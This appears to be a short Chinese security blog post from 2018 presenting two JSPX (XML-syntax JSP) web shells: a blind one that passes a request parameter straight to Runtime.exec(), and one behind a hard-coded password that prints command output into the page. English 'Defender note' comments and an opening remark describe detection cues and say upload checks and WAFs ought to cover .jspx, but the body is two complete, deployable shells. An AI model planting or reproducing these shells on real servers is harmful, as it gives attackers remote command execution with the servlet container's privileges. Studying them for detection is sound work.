jspx webshell

2018年5月28日 0 By hackeye

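jspx 是 JSP 2.0 中一项重要的功能提升，jspx 其实是以 XML 语法来书写 JSP。在 Tomcat 等容器的默认配置下，.jspx 与 .jsp 一样会被 JSP 引擎编译执行，因此上传后缀校验、WAF 规则和 Web 目录的文件完整性监控都应同时覆盖 .jspx。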
jspx一句话无回显命令执行:
<jsp:root xmlns:jsp=”http://java.sun.com/JSP/Page”  version=”1.2″>
<jsp:directive.page contentType=”text/html” pageEncoding=”UTF-8″ />
<!--
  Defender note: minimal JSP Document (XML syntax) web shell.
  The scriptlet below hands the request parameter named hackeye straight to
  Runtime.exec(). No condition guards the call, so any client that can request
  this page can start a process with the privileges of the servlet container.
  The Process returned by exec() is discarded, so nothing is written back to
  the response (blind execution).
  What to look for: an unexpected .jspx file under a web root that combines
  Runtime.getRuntime().exec with request.getParameter, and child processes
  started by the application server's JVM.
  If found: treat the host as compromised and establish how the file was
  written (upload handler, deployment credentials, vulnerable application)
  before removing it.
-->
<jsp:scriptlet>
Runtime.getRuntime().exec(request.getParameter(“hackeye”));
</jsp:scriptlet>
</jsp:root>

带回显执行:
<jsp:root xmlns:jsp=”http://java.sun.com/JSP/Page”  version=”1.2″>
<jsp:directive.page contentType=”text/html” pageEncoding=”UTF-8″ />
<!--
  Defender note: JSP Document web shell that returns command output.
  The scriptlet compares the request parameter pwd with a hard-coded string.
  That constant is the only gate and is readable by anyone who obtains this
  file, so it is not authentication.
  When the comparison succeeds, the request parameter i is passed to
  Runtime.exec() and the child process's standard output is read in a loop and
  printed into the response, wrapped in pre tags.
  What to look for: requests to a .jspx path carrying both a pwd and an i
  parameter, text/html responses from that path containing command output, and
  shells or system utilities started by the servlet container's JVM.
  If found: treat the host as compromised and establish how the file was
  written (upload handler, deployment credentials, vulnerable application)
  before removing it.
-->
<jsp:scriptlet>
if(“hackeye”.equals(request.getParameter(“pwd”))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(“i”)).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print(“&lt;pre&gt;”);
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print(“&lt;/pre&gt;”);
}
</jsp:scriptlet>
</jsp:root>